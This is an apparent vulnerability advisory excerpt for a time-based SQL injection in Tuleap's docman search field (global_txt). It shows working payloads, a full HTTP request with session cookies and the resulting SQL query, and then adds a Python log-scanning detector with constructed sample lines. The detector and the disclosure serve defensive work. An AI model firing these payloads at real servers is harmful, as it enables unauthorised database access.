SQL Trigger URL:
<code>
https://[IP]/plugins/docman/?group_id=100&id=16&action=search&global_txt=ad'%2bIF(SUBSTRING(@@version,1,1)=5,BENCHMARK(20000000,MD5(1)),null)%2b'&global_filtersubmit=Apply
</code>
SQL Full Request:
<code>
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=ad'%2bbenchmark(20000000%2csha1(1))%2b'&global_filtersubmit=Apply HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
</code>
SQL PoC generated query:
<code>
SELECT i.*, v.id as version_id, v.number as version_number, v.user_id as version_user_id, v.label as version_label, v.changelog as version_changelog, v.date as version_date, v.filename as version_filename, v.filesize as version_filesize, v.filetype as version_filetype, v.path as version_path, 1 as folder_nb_of_children FROM plugin_docman_item AS i LEFT JOIN plugin_docman_version AS v ON (i.item_id = v.item_id) LEFT JOIN plugin_docman_version AS v2 ON (v2.item_id = v.item_id AND v.number < v2.number) WHERE 1 AND i.delete_date IS NULL AND (i.obsolescence_date = 0 OR i.obsolescence_date > 1409011201) AND v2.id IS NULL AND i.group_id = 100 AND (MATCH (i.title, i.description) AGAINST ('ad'+benchmark(20000000,md5(1))+'' IN BOOLEAN MODE) OR MATCH (v.label, v.changelog, v.filename) AGAINST ('ad'+benchmark(20000000,md5(1))+'' IN BOOLEAN MODE)) ORDER BY i.update_date DESC;
</code>
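The generated query above shows the unescaped global_txt value landing inside the MATCH ... AGAINST string literal, so a quote followed by a MySQL timing function in that parameter is a clean detection signal for this probe in web server access logs. The following is an added detection example and is not part of the original advisory or of Tuleap; the log lines are constructed, and the function and parameter names are the author's own choice.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the advisory). The first mirrors
# the shape of the advisory's request; the other two are benign docman traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Aug/2014:10:00:00 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=ad'%2bbenchmark(20000000%2csha1(1))%2b'&global_filtersubmit=Apply HTTP/1.1" 200 5120
192.0.2.11 - - [26/Aug/2014:10:00:05 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=release+notes&global_filtersubmit=Apply HTTP/1.1" 200 4096
192.0.2.12 - - [26/Aug/2014:10:00:09 +0000] "GET /plugins/docman/?group_id=100&action=show&id=16 HTTP/1.1" 200 2048
"""

# Common-log-format request field: "<method> <target> HTTP/<version>"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The advisory's probes rely on MySQL timing functions; a single quote next to
# one of them inside a free-text search field matches the generated query shape.
TIMING_FUNCS = re.compile(r"\b(benchmark|sleep)\s*\(", re.IGNORECASE)


def suspicious_search_params(line: str) -> list[str]:
    """Names of docman query parameters in one log line whose decoded value
    carries a quote character together with a timing-function call."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.startswith("/plugins/docman/"):
        return []
    hits = []
    # parse_qs percent-decodes once, so %2b/%2c become the literal + and ,
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if any("'" in v and TIMING_FUNCS.search(v) for v in values):
            hits.append(name)
    return hits


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """(line number, flagged parameter names) for every suspicious line."""
    results = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = suspicious_search_params(line)
        if hits:
            results.append((lineno, hits))
    return results


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: time-based SQLi probe in {', '.join(hits)}")
```

Running the block against SAMPLE_LOG flags only the first line, on global_txt; the benign search and the non-search request pass untouched.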